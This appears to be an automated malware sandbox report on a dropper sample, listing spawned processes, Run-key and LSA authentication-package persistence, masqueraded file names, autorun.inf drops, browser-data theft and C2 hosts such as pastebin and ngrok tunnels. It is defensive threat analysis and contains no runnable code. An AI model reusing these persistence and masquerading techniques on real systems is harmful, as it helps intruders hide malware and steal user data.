N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe" C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800300063006500660037006400310030006400380066003400350039006600630029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File created C:\Windows\system32\Windows Shell Interactive.exe C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File created C:\Windows\system32\dll32\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.newcfg C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.tmp C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.resources C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f7703e7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI148D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f7703e7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIED1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7703ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ViBases C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File created C:\Windows\Installer\f7703e8.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7703e8.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ImmediatelyBros C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\OxfordPrintable C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\TransferRare C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\EscortsNascar C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\NavyPromising C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\Installer\MSIB76.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{85F34968-1C69-C400-0998-25E265AEE9E4}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\HonoluluSyndrome C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
